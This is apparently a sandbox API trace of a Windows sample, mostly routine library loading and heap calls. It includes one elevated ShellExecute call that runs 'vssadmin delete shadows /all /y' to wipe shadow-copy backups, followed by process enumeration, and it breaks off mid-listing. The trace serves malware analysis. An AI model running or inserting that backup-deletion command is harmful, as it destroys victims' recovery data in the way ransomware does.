[0046.053] GetProcAddress (hModule=0x76750000, lpProcName="CloseThreadpoolTimer") returned 0x7789b740 [0046.053] GetProcAddress (hModule=0x76750000, lpProcName="CreateThreadpoolWait") returned 0x76766d70 [0046.053] GetProcAddress (hModule=0x76750000, lpProcName="SetThreadpoolWait") returned 0x7789c0b0 [0046.053] GetProcAddress (hModule=0x76750000, lpProcName="CloseThreadpoolWait") returned 0x7789be10 [0046.053] GetProcAddress (hModule=0x76750000, lpProcName="FlushProcessWriteBuffers") returned 0x778c2b20 [0046.053] GetProcAddress (hModule=0x76750000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x778b8e50 [0046.053] GetProcAddress (hModule=0x76750000, lpProcName="GetCurrentProcessorNumber") returned 0x778b52f0 [0046.053] GetProcAddress (hModule=0x76750000, lpProcName="CreateSymbolicLinkW") returned 0x76764510 [0046.053] GetProcAddress (hModule=0x76750000, lpProcName="GetCurrentPackageId") returned 0x748ae260 [0046.053] GetProcAddress (hModule=0x76750000, lpProcName="GetTickCount64") returned 0x76760db0 [0046.053] GetProcAddress (hModule=0x76750000, lpProcName="GetFileInformationByHandleEx") returned 0x767643d0 [0046.054] GetProcAddress (hModule=0x76750000, lpProcName="SetFileInformationByHandle") returned 0x767bf110 [0046.054] GetProcAddress (hModule=0x76750000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x767bf1e0 [0046.054] GetProcAddress (hModule=0x76750000, lpProcName="InitializeConditionVariable") returned 0x778b3a00 [0046.054] GetProcAddress (hModule=0x76750000, lpProcName="WakeConditionVariable") returned 0x77928c50 [0046.054] GetProcAddress (hModule=0x76750000, lpProcName="WakeAllConditionVariable") returned 0x778b8a90 [0046.054] GetProcAddress (hModule=0x76750000, lpProcName="SleepConditionVariableCS") returned 0x7491fca0 [0046.054] GetProcAddress (hModule=0x76750000, lpProcName="InitializeSRWLock") returned 0x778b3a00 [0046.054] GetProcAddress (hModule=0x76750000, lpProcName="AcquireSRWLockExclusive") returned 0x778958e0 [0046.054] GetProcAddress (hModule=0x76750000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77912ce0 [0046.054] GetProcAddress (hModule=0x76750000, lpProcName="ReleaseSRWLockExclusive") returned 0x778983a0 [0046.054] GetProcAddress (hModule=0x76750000, lpProcName="SleepConditionVariableSRW") returned 0x7491fcf0 [0046.054] GetProcAddress (hModule=0x76750000, lpProcName="CreateThreadpoolWork") returned 0x76766db0 [0046.055] GetProcAddress (hModule=0x76750000, lpProcName="SubmitThreadpoolWork") returned 0x7789eb00 [0046.055] GetProcAddress (hModule=0x76750000, lpProcName="CloseThreadpoolWork") returned 0x7789ed50 [0046.055] GetProcAddress (hModule=0x76750000, lpProcName="CompareStringEx") returned 0x76767050 [0046.055] GetProcAddress (hModule=0x76750000, lpProcName="GetLocaleInfoEx") returned 0x76767190 [0046.055] GetProcAddress (hModule=0x76750000, lpProcName="LCMapStringEx") returned 0x76767480 [0046.055] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x747b0000 [0046.055] GetProcAddress (hModule=0x747b0000, lpProcName="InitializeConditionVariable") returned 0x778b3a00 [0046.055] GetProcAddress (hModule=0x747b0000, lpProcName="SleepConditionVariableCS") returned 0x7491fca0 [0046.055] GetProcAddress (hModule=0x747b0000, lpProcName="WakeAllConditionVariable") returned 0x778b8a90 [0046.055] RtlInitializeConditionVariable (in: ConditionVariable=0x108616c | out: ConditionVariable=0x108616c) [0046.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x800) returned 0x3f5e0 [0046.056] QueryPerformanceFrequency (in: lpFrequency=0x118f9f4 | out: lpFrequency=0x118f9f4*=100000000) returned 1 [0046.056] QueryPerformanceCounter (in: lpPerformanceCount=0x118f9ec | out: lpPerformanceCount=0x118f9ec*=13980781957) returned 1 [0046.056] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0046.056] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x103c2d7) returned 0x0 [0046.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x37bc0 [0046.056] LoadLibraryExW (lpLibFileName="api-ms-win-core-string-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x747b0000 [0046.056] GetProcAddress (hModule=0x747b0000, lpProcName="CompareStringEx") returned 0x74872c20 [0046.056] GetProcAddress (hModule=0x747b0000, lpProcName="EnumSystemLocalesEx") returned 0x74873a60 [0046.056] LoadLibraryExW (lpLibFileName="api-ms-win-core-datetime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x747b0000 [0046.057] GetProcAddress (hModule=0x747b0000, lpProcName="GetDateFormatEx") returned 0x748e9b40 [0046.057] GetProcAddress (hModule=0x747b0000, lpProcName="GetLocaleInfoEx") returned 0x7489f170 [0046.057] GetProcAddress (hModule=0x747b0000, lpProcName="GetTimeFormatEx") returned 0x748e9e10 [0046.057] GetProcAddress (hModule=0x747b0000, lpProcName="GetUserDefaultLocaleName") returned 0x748a4220 [0046.057] GetProcAddress (hModule=0x747b0000, lpProcName="IsValidLocaleName") returned 0x7489ed60 [0046.057] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-obsolete-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x747b0000 [0046.057] GetProcAddress (hModule=0x747b0000, lpProcName="LCIDToLocaleName") returned 0x7489da50 [0046.057] GetProcAddress (hModule=0x747b0000, lpProcName="LocaleNameToLCID") returned 0x7487bac0 [0046.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x40468 [0046.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x37b40 [0046.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x37b40 | out: hHeap=0x20000) returned 1 [0046.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x37ba0 [0046.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x37a80 [0046.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x18) returned 0x35490 [0046.058] GetLastError () returned 0x0 [0046.058] SetLastError (dwErrCode=0x0) [0046.058] GetLastError () returned 0x0 [0046.058] SetLastError (dwErrCode=0x0) [0046.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x316a0 [0046.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x40a70 [0046.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40a70 | out: hHeap=0x20000) returned 1 [0046.058] GetLastError () returned 0x0 [0046.058] SetLastError (dwErrCode=0x0) [0046.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x37b40 [0046.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x37bb0 [0046.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x4) returned 0x37b50 [0046.059] GetLastError () returned 0x0 [0046.059] SetLastError (dwErrCode=0x0) [0046.059] GetLastError () returned 0x0 [0046.059] SetLastError (dwErrCode=0x0) [0046.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x3b940 [0046.059] GetLastError () returned 0x0 [0046.059] SetLastError (dwErrCode=0x0) [0046.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x40a70 [0046.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40a70 | out: hHeap=0x20000) returned 1 [0046.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x37b40 | out: hHeap=0x20000) returned 1 [0046.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x316a0 | out: hHeap=0x20000) returned 1 [0046.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x37b50 | out: hHeap=0x20000) returned 1 [0046.059] GetLastError () returned 0x0 [0046.059] SetLastError (dwErrCode=0x0) [0046.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x37b50 [0046.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x37b70 [0046.059] GetLastError () returned 0x0 [0046.059] SetLastError (dwErrCode=0x0) [0046.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x200) returned 0x40a70 [0046.059] GetLastError () returned 0x0 [0046.059] SetLastError (dwErrCode=0x0) [0046.059] GetLastError () returned 0x0 [0046.059] SetLastError (dwErrCode=0x0) [0046.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x4) returned 0x37b40 [0046.059] GetLastError () returned 0x0 [0046.059] SetLastError (dwErrCode=0x0) [0046.059] GetLastError () returned 0x0 [0046.059] SetLastError (dwErrCode=0x0) [0046.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x316a0 [0046.060] GetLastError () returned 0x0 [0046.060] SetLastError (dwErrCode=0x0) [0046.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x40c78 [0046.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40c78 | out: hHeap=0x20000) returned 1 [0046.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x37b50 | out: hHeap=0x20000) returned 1 [0046.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x3b940 | out: hHeap=0x20000) returned 1 [0046.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x37b40 | out: hHeap=0x20000) returned 1 [0046.060] GetLastError () returned 0x0 [0046.060] SetLastError (dwErrCode=0x0) [0046.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x37b40 [0046.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x37b70 | out: hHeap=0x20000) returned 1 [0046.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x37bb0 | out: hHeap=0x20000) returned 1 [0046.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x37bb0 [0046.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x37b50 [0046.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x37b70 [0046.060] GetCurrentThread () returned 0xfffffffe [0046.061] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x118f9e0, lpExitTime=0x118f9e8, lpKernelTime=0x118f9e8, lpUserTime=0x118f9e8 | out: lpCreationTime=0x118f9e0, lpExitTime=0x118f9e8, lpKernelTime=0x118f9e8, lpUserTime=0x118f9e8) returned 1 [0046.061] RtlInitializeSListHead (in: ListHead=0x1086548 | out: ListHead=0x1086548) [0046.061] htonl (hostlong=0x0) returned 0x0 [0046.061] htonl (hostlong=0x7f000001) returned 0x100007f [0046.061] htonl (hostlong=0xffffffff) returned 0xffffffff [0046.061] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x118f860 | out: lpWSAData=0x118f860) returned 0 [0046.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1b) returned 0x403f0 [0046.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1b) returned 0x405a8 [0046.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1b) returned 0x405d0 [0046.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x41068 [0046.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1b) returned 0x40508 [0046.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1b) returned 0x40558 [0046.065] GetLastError () returned 0x0 [0046.065] SetLastError (dwErrCode=0x0) [0046.065] FreeConsole () returned 1 [0046.139] ShellExecuteA (hwnd=0x0, lpOperation="runas", lpFile="powershell.exe", lpParameters="vssadmin delete shadows /all /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0053.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52ea8 [0053.979] LoadLibraryExW (lpLibFileName="api-ms-win-security-systemfunctions-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x76390000 [0053.980] GetProcAddress (hModule=0x76390000, lpProcName="SystemFunction036") returned 0x743129e0 [0053.980] SystemFunction036 (in: RandomBuffer=0x118e2fc, RandomBufferLength=0x4 | out: RandomBuffer=0x118e2fc) returned 1 [0053.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52ea8 | out: hHeap=0x20000) returned 1 [0053.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88478 [0053.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52ea8 [0053.980] SystemFunction036 (in: RandomBuffer=0x118e2fc, RandomBufferLength=0x4 | out: RandomBuffer=0x118e2fc) returned 1 [0053.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x71fc8 [0053.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52ea8 | out: hHeap=0x20000) returned 1 [0053.980] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x2cc [0053.998] Process32First (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0053.999] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0054.000] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0054.001] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.001] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0054.002] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0054.003] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0054.004] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0054.005] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0054.006] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.007] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0054.045] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0054.046] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.047] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0054.048] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.049] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.050] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.050] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.051] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.052] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.053] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.054] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.055] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.056] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.057] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0054.057] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.058] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0054.059] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0054.060] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.061] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0054.062] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x7c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0054.062] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x828, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0054.063] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0054.064] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0054.065] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0054.066] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0054.067] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0054.069] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0054.070] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="fur.exe")) returned 1 [0054.072] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="packages_omissions.exe")) returned 1 [0054.073] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="fame-vat.exe")) returned 1 [0054.074] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="honors_shoe_diabetes.exe")) returned 1 [0054.075] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="superb last.exe")) returned 1 [0054.076] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="threaded_allergy_bacteria.exe")) returned 1 [0054.077] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: lppe=0x118e0f0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="successful_carmen_mud.exe")) returned 1 [0054.077] Process32Next (in: hSnapshot=0x2cc, lppe=0x118e0f0 | out: 